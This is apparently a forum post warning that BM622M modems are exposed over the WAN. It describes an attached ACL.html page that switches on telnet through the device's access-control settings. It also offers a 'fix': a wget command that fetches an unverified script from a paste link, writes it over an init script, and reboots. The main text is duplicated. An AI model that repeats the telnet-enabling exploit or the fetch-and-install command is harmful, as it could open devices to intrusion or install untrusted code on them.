NOTICE, BM622M IS NOT SECURE! MAKE SURE YOUR GUI IS NOT ACCESSIBLE VIA WAN ON EITHER 80 OR 443, YOU CAN BE REMOTED, CHANGING PASSWORD IS NOT ENOUGH. TRYING TO MASK THE MAC IS NOT CLEVER EITHER. IF THEY CAN SEE YOU THEY CAN REMOTE YOU, SIMPLE AS THAT.
I discovered this today now I am making it public. Just open ACL.html and check the telnet box to enable it and hit apply, if it works you will be taken to the login screen. This is set for bm622m with gui page at http://192.168.254.1/, you can edit the html file in notepad to change it. China made product = more holes than Spongebob Squarepants... Not working for bm623m though. Also this is not working on bm622m 2013.
If you want to fix your modem connect to it with telnet and run this command:
wget http://*** BANNED LINK - DO NOT POST ***/raw.php?i=T3qSMCab -O /etc/init.d/networking_lan
reboot
This will completely disable incoming connections on port 443 and prevent remoters from accessing your modem. Good luck.
I discovered this today now I am making it public. Just open ACL.html and check the telnet box to enable it and hit apply, if it works you will be taken to the login screen. This is set for bm622m with gui page at http://192.168.254.1/, you can edit the html file in notepad to change it. China made product = more holes than Spongebob Squarepants... Not working for bm623m though. Also this is not working on bm622m 2013.
If you want to fix your modem connect to it with telnet and run this command:
wget http://*** BANNED LINK - DO NOT POST ***/raw.php?i=T3qSMCab -O /etc/init.d/networking_lan
reboot
This will completely disable incoming connections on port 443 and prevent remoters from accessing your modem. Good luck.
Attachments
Last edited: